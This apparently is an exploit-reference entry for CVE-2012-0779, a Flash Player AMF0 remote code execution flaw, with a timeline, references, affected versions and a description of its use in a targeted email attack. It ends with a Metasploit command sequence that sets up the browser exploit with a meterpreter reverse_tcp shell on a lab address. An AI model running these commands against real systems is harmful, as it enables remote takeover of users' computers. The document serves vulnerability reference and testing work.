Timeline :
Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2012-05-04
Details of the vulnerability provided the 2012-05-06
Metasploit PoC provided the 2012-06-22
PoC provided by :
sinn3r
juan vazquez
Reference(s) :
CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395
Affected version(s) :
Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x
Tested on Windows XP Pro SP3 with :
Internet Explorer 6
Adobe Flash Player 11.2.202.228
Description :
This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.
Commands :
use exploit/windows/browser/adobe_flash_rtmp set RTMPHOST 192.168.178.100 set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid